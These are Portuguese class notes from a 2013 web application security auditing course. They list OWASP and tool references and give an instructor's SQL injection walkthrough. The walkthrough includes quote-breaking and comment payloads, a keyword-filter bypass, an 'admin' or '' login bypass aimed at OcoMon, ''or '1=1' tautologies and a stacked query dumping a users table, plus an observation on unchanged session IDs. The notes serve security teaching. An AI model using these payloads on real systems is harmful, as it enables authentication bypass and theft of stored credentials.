Anotaes

Curso Auditoria de Segurana em Aplicaes Web EAD Aula 1 Julho de 2013

Kali Linux
http://www.kali.org/
OWASP Broken Web Applications Project
https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
OWASP - Open Web Application Security Project
https://www.owasp.org/
Projeto OWASP Webgoat
https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
Protocolo HTTP
http://simplesideias.com.br/entendendo-um-pouco-mais-sobre-o-protocolo-http
OWASP Top 10 Project
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
RFC do HTTP 1.1
http://tools.ietf.org/html/rfc2616
O que so cookies
http://www.tecmundo.com.br/web/1069-o-que-sao-cookies-.htm

DNS
http://registro.br/suporte/faq/faq5.html
Mtodos HTTP
http://www.vivaolinux.com.br/artigo/Um-pouco-do-protocolo-HTTP?pagina=4
Curso Teste de Invaso em Redes e Sistemas EAD Clavis
https://www.clavis.com.br/treinamento-ensino-a-distancia-ead/teste-de-invasao-em-redes-esistemas/index.php
AJAX
http://codigofonte.uol.com.br/artigos/o-que-e-o-ajax-e-como-ele-funciona
http://www.metropoledigital.ufrn.br/aulas_avancado/web/disciplinas/desenv_web/aula_20.html
Certificados Digitais
http://www.receita.fazenda.gov.br/Novidades/Informa/DestaqueCertificadoDigital.htm
Ginga
http://www.ginga.org.br/pt-br

Proxy
http://www.tecmundo.com.br/navegador/972-o-que-e-proxy-.htm
tamperdata
http://tamperdata.mozdev.org/
Firebug
http://getfirebug.com/
OWASP Top 10 - 2013
https://www.owasp.org/index.php/Top_10_2013-Top_10

OWASP Top 10 2013 - A1 Injeo

https://www.owasp.org/index.php/Top_10_2013-A1-Injection
SQL Injection
http://wiki.postgresql.org/wiki/Sql_injection
whitelist vs blacklist
http://www.testingsecurity.com/whitelists_vs_blacklists
Wireshark
http://www.wireshark.org/
Session Hijacking - Sequestro de sso
http://searchsoftwarequality.techtarget.com/definition/session-hijacking
Webinar # 16 Ataques de Fora Bruta Clavis
http://www.blog.clavis.com.br/webinar-16-ataques-de-forca-bruta-metodo-dicionario-hibridos-erainbow-tables/
Burp Proxy
http://portswigger.net/burp/proxy.html
Token
http://www.tecmundo.com.br/senha/3077-o-que-e-token-.htm
sqlmap
http://sqlmap.org/
Pgina vulnervel acunetix ASP
http://testasp.vulnweb.com/
Pgina vulnervel acunetix PHP
http://testphp.vulnweb.com/

SQL Injection cheat sheet

http://ha.ckers.org/sqlinjection/
Web Application Firewall
https://www.owasp.org/index.php/Web_Application_Firewall
XKCD
http://xkcd.com/
SEGINFO
http://www.seginfo.com.br/
Tirinha original
http://xkcd.com/327/
O que Hash
http://www.techtudo.com.br/artigos/noticia/2012/07/o-que-e-hash.html
Codebox do Instrutor
Querys SQL
Nome: Rafael
Back End
select id from users where
nome = 'Rafael";
Status: OK!

Nome:D'Avila
Back End
select id from users where
nome = 'D'Avila";
Status: Buscaria por D, porm daria erro porque esperava um ; e veio um A
Nome:D';--Avila
Back End
select id from users where
nome = 'D';--Avila";
No daria erro: caractere ; termina a linha e -- insere um comentrio
Para bypassar casos de truncamento de strings:
seleselectct id from ...
Comando para ser utilizado no OcoMon
admin' or ' -Identificando Session IDs durante autorizao
GET no portal = mj0qgdngj4ithnvonsrgaekn00
Post de auth = mj0qgdngj4ithnvonsrgaekn00
Depois da auth = mj0qgdngj4ithnvonsrgaekn00
Exemplo de Querys de SQL
select id from usuarios where
nome = '$nome'
and
senha = '$senha';

Nome: Rafael
Senha: abc123
select id from usuarios where
nome = 'Rafael'
and
senha = 'abc123';
Criando uma busca para gerar uma verdade absoluta
select id from usuarios where
nome = 'Rafael'
and
senha = ''or '1=1';
Tentativa de insero de comandos
Nome: Rafael
Senha: ' ; select * from usuarios where '1=1
select id from usuarios where
nome = 'Rafael'
and
senha = ' ' ; select * from usuarios where '1=1';
id

nome

senha

Rafael

qwerty

----